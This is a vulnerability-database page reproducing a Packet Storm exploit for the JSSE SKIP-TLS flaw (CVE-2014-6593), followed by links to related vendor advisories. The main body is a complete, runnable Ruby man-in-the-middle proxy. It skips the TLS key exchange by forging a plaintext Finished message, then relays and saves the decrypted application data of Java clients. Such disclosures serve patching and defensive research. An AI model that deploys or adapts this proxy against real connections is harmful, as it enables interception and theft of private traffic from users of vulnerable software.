Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRamon de C VallePACKETSTORM:134251
HistoryNov 06, 2015 - 12:00 a.m.

Java Secure Socket Extension (JSSE) SKIP-TLS

2015-11-0600:00:00
Ramon de C Valle
packetstormsecurity.com
36

0.652 Medium

EPSS

Percentile

97.6%

JSON
`#!/usr/bin/env ruby  
# encoding: ASCII-8BIT  
# By Ramon de C Valle. This work is dedicated to the public domain.  
  
require 'openssl'  
require 'optparse'  
require 'socket'  
  
Version = [0, 0, 1]  
Release = nil  
  
def prf(secret, label, seed)  
if secret.empty?  
s1 = s2 = ''  
else  
length = ((secret.length * 1.0) / 2).ceil  
s1 = secret[0..(length - 1)]  
s2 = secret[(length - 1)..(secret.length - 1)]  
end  
  
hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed)  
hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed)  
  
hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed)  
hmac_sha1 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha1 + label + seed)  
  
result = ''  
[hmac_md5.length, hmac_sha1.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha1.getbyte(i) || 0)].pack('C') }  
result  
end  
  
def prf_sha256(secret, label, seed)  
hmac_sha256 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)  
OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_sha256 + label + seed)  
end  
  
class String  
def hexdump(stream=$stdout)  
0.step(bytesize - 1, 16) do |i|  
stream.printf('%08x ', i)  
  
0.upto(15) do |j|  
stream.printf(' ') if j == 8  
  
if i + j >= bytesize  
stream.printf(' ')  
else  
stream.printf('%02x ', getbyte(i + j))  
end  
end  
  
stream.printf(' ')  
  
0.upto(15) do |j|  
if i + j >= bytesize  
stream.printf(' ')  
else  
if /[[:print:]]/ === getbyte(i + j).chr && /[^[:space:]]/ === getbyte(i + j).chr  
stream.printf('%c', getbyte(i + j))  
else  
stream.printf('.')  
end  
end  
end  
  
stream.printf("\n")  
end  
end  
end  
  
options = {}  
  
OptionParser.new do |parser|  
parser.banner = "Usage: #{parser.program_name} [options] host"  
  
parser.separator('')  
parser.separator('Options:')  
  
parser.on('-H', '--local-host HOST', 'Local host') do |host|  
options[:local_host] = host  
end  
  
parser.on('-P', '--local-port PORT', 'Local port') do |port|  
options[:local_port] = port  
end  
  
parser.on('-d', '--debug', 'Debug mode') do  
options[:debug] = true  
end  
  
parser.on('-h', '--help', 'Show this message') do  
puts parser  
exit  
end  
  
parser.on('-o', '--output FILE', 'Output file') do |file|  
options[:file] = File.new(file, 'w+b')  
end  
  
parser.on('-p', '--port PORT', 'Port') do |port|  
options[:port] = port  
end  
  
parser.on('-v', '--verbose', 'Verbose mode') do  
options[:verbose] = true  
end  
  
parser.on('--version', 'Show version') do  
puts parser.ver  
exit  
end  
end.parse!  
  
local_host = options[:local_host] || '0.0.0.0'  
local_port = options[:local_port] || 443  
debug = options[:debug] || false  
file = options[:file] || nil  
host = ARGV[0] or fail ArgumentError, 'no host given'  
port = options[:port] || 443  
verbose = options[:verbose] || false  
  
proxy = TCPServer.new(local_host, local_port)  
puts 'Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]] if debug || verbose  
  
loop do  
Thread.start(proxy.accept) do |client|  
puts 'Accepted connection from %s:%d' % [client.peeraddr[2], client.peeraddr[1]] if debug || verbose  
  
finished_sent = false  
handshake_messages = ''  
version = ''  
  
context = OpenSSL::SSL::SSLContext.new(:TLSv1)  
context.verify_mode = OpenSSL::SSL::VERIFY_NONE  
  
tcp_socket = TCPSocket.new(host, port)  
ssl_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context)  
ssl_server.connect  
  
puts 'Connected to %s:%d' % [ssl_server.peeraddr[2], ssl_server.peeraddr[1]] if debug || verbose  
  
server = TCPSocket.new(host, port)  
  
puts 'Connected to %s:%d' % [server.peeraddr[2], server.peeraddr[1]] if debug || verbose  
  
loop do  
readable, = IO.select([client, server])  
  
readable.each do |r|  
if r == ssl_server  
# ssl_server is an SSL socket; read application data directly  
header = ''  
fragment = r.readpartial(4096)  
fragment.hexdump($stderr) if debug  
puts '%d bytes received' % [fragment.bytesize] if debug || verbose  
else  
header = r.read(5)  
raise EOFError if header.nil?  
header.hexdump($stderr) if debug  
puts '%d bytes received' % [header.bytesize] if debug || verbose  
  
fragment = r.read(header[3, 2].unpack('n')[0])  
fragment.hexdump($stderr) if debug  
puts '%d bytes received' % [fragment.bytesize] if debug || verbose  
end  
  
if finished_sent  
if file  
# Save application data  
file.write(fragment)  
file.flush  
file.fsync  
end  
elsif fragment =~ /^\x0e\x00\x00\x00/ # server_hello_done  
# Drop the server hello done message and send the finished  
# message in plaintext.  
if header[2, 1] == "\x03"  
verify_data = prf_sha256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))  
verify_data = verify_data[0, 12]  
else  
verify_data = prf('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))  
verify_data = verify_data[0, 12]  
end  
  
finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}"  
record = header[0, 3] + [finished.length].pack('n') + finished  
  
count = client.write(record)  
client.flush  
record.hexdump($stderr) if debug  
puts '%d bytes sent' % [count] if debug || verbose  
  
finished_sent = true  
  
# Change to the SSL socket  
server.close  
server = ssl_server  
  
# Save version used in the handshake  
version = header[2, 1]  
  
next  
else  
# Save handshake messages  
handshake_messages << fragment  
end  
  
case r  
when client  
if finished_sent  
# server is an SSL socket  
count = server.write(fragment)  
server.flush  
fragment.hexdump($stderr) if debug  
puts '%d bytes sent' % [count] if debug || verbose  
else  
# server isn't an SSL socket  
record = header + fragment  
count = server.write(record)  
server.flush  
record.hexdump($stderr) if debug  
puts '%d bytes sent' % [count] if debug || verbose  
end  
  
when ssl_server  
# client isn't an SSL socket; add the record layer header with  
# the same version used in the handshake.  
header = "\x17\x03#{version}" + [fragment.length].pack('n')  
record = header + fragment  
count = client.write(record)  
client.flush  
record.hexdump($stderr) if debug  
puts '%d bytes sent' % [count] if debug || verbose  
  
when server  
record = header + fragment  
count = client.write(record)  
client.flush  
record.hexdump($stderr) if debug  
puts '%d bytes sent' % [count] if debug || verbose  
end  
end  
end  
  
client.close  
server.close  
end  
end  
  
proxy.close  
`

Related

threatpost 1
vmware 2
veracode 1
debiancve 1
kaspersky 1
prion 1
ubuntucve 1
ibm 82
cve 2
zdt 2
packetstorm 1
nessus 39
openvas 29
f5 4
redhat 10
debian 3
osv 2
centos 4
amazon 3
oraclelinux 4
mageia 1
suse 2
ubuntu 2
aix 1
threatpost
threatpost
VMware Fixes Java Information Disclosure Vulnerability
2015-04-03 11:03:15
vmware
vmware
VMware product updates address critical information disclosure issue in JRE.
2015-04-02 00:00:00
VMware product updates address critical information disclosure issue in JRE
2015-04-02 00:00:00
veracode
veracode
Authorization Bypass
2019-05-02 05:07:16
debiancve
debiancve
CVE-2014-6593
2015-01-21 15:28:00
kaspersky
kaspersky
KLA10530 JRE update for multiple VMware products
2015-04-02 00:00:00
prion
prion
Design/Logic Flaw
2015-01-21 15:28:00
ubuntucve
ubuntucve
CVE-2014-6593
2015-01-21 00:00:00
ibm
ibm
Security Bulletin: Vulnerability in IBM Java SDK affects IBM SONAS (CVE-2014-6593)
2018-06-18 00:09:22
Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Data Studio Web Console. (CVE-2014-6593, CVE-2015-0410)
2018-06-16 13:10:05
Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affects Rational Directory Server (CVE-2014-6457, CVE-2014-6593)
2018-06-17 04:59:51
cve
cve
CVE-2014-6593
2015-01-21 15:28:00
CVE-2015-6593
2015-05-30 19:59:00
zdt
zdt
Java Secure Socket Extension (JSSE) SKIP-TLS
2015-11-05 00:00:00
Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy Exploit
2015-08-13 00:00:00
packetstorm
packetstorm
Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy
2015-08-12 00:00:00
nessus
nessus
VMware vSphere Update Manager Java Vulnerability (VMSA-2015-0003)
2015-05-01 00:00:00
Oracle JRockit R27.8.4 / R28.3.4 Multiple Vulnerabilities (January 2015 CPU) (POODLE)
2015-01-21 00:00:00
Oracle Java SE 5 < Update 76 / 6 < Update 86 / 7 < Update 73 / 8 < Update 26 Multiple Vulnerabilities
2015-02-12 00:00:00
openvas
openvas
VMware NSX updates address critical information disclosure issue in JRE (VMSA-2015-0003)
2015-10-27 00:00:00
Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 (Feb 2015) - Linux
2015-02-02 00:00:00
Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 (Feb 2015) - Windows
2015-02-02 00:00:00
f5
f5
K16353 : Multiple JavaSE server-side vulnerabilities CVE-2015-0383, CVE-2015-0410, and CVE-2014-6593
2015-04-02 00:00:00
SOL16353 - Multiple JavaSE server-side vulnerabilities CVE-2015-0383, CVE-2015-0410, and CVE-2014-6593
2015-04-02 00:00:00
SOL16352 - Multiple OpenJDK vulnerabilities
2015-04-02 00:00:00
redhat
redhat
(RHSA-2015:0136) Important: java-1.5.0-ibm security update
2015-02-05 00:00:00
(RHSA-2015:0085) Important: java-1.6.0-openjdk security update
2015-01-26 00:00:00
(RHSA-2015:0068) Important: java-1.7.0-openjdk security update
2015-01-20 00:00:00
debian
debian
[SECURITY] [DSA 3147-1] openjdk-6 security update
2015-01-30 15:57:23
[SECURITY] [DLA 157-1] openjdk-6 security update
2015-02-24 18:21:15
[SECURITY] [DSA 3144-1] openjdk-7 security update
2015-01-29 21:57:25
osv
osv
openjdk-6 - security update
2015-01-30 00:00:00
openjdk-6 - security update
2015-02-24 00:00:00
centos
centos
java security update
2015-01-26 19:17:49
java security update
2015-01-21 05:35:44
java security update
2015-01-21 05:42:52
amazon
amazon
Important: java-1.6.0-openjdk
2015-02-11 19:38:00
Critical: java-1.7.0-openjdk
2015-01-22 14:18:00
Important: java-1.8.0-openjdk
2015-01-22 14:20:00
oraclelinux
oraclelinux
java-1.7.0-openjdk security update
2015-01-21 00:00:00
java-1.7.0-openjdk security update
2015-01-21 00:00:00
java-1.6.0-openjdk security update
2015-01-26 00:00:00
mageia
mageia
Updated java-1.7.0-openjdk packages fix security vulnerabilities
2015-01-24 17:32:04
suse
suse
Security update for java-1_7_0-openjdk (important)
2015-02-02 12:04:48
Security update for java-1_7_0-openjdk (important)
2015-03-16 12:05:47
ubuntu
ubuntu
OpenJDK 6 vulnerabilities
2015-01-27 00:00:00
OpenJDK 7 vulnerabilities
2015-01-28 00:00:00
aix
aix
Multiple vulnerabilities in current releases of IBM SDK Java Technology Edition; issues disclosed in the Oracle Feb 2015 Critical Patch Update vulnerability and two additional Vuln
2015-02-19 10:53:54

0.652 Medium

EPSS

Percentile

97.6%

JSON
Related for PACKETSTORM:134251
threatpost1vmware2veracode1debiancve1kaspersky1prion1ubuntucve1ibm82cve2zdt2packetstorm1nessus39openvas29f54redhat10debian3osv2centos4amazon3oraclelinux4mageia1suse2ubuntu2aix1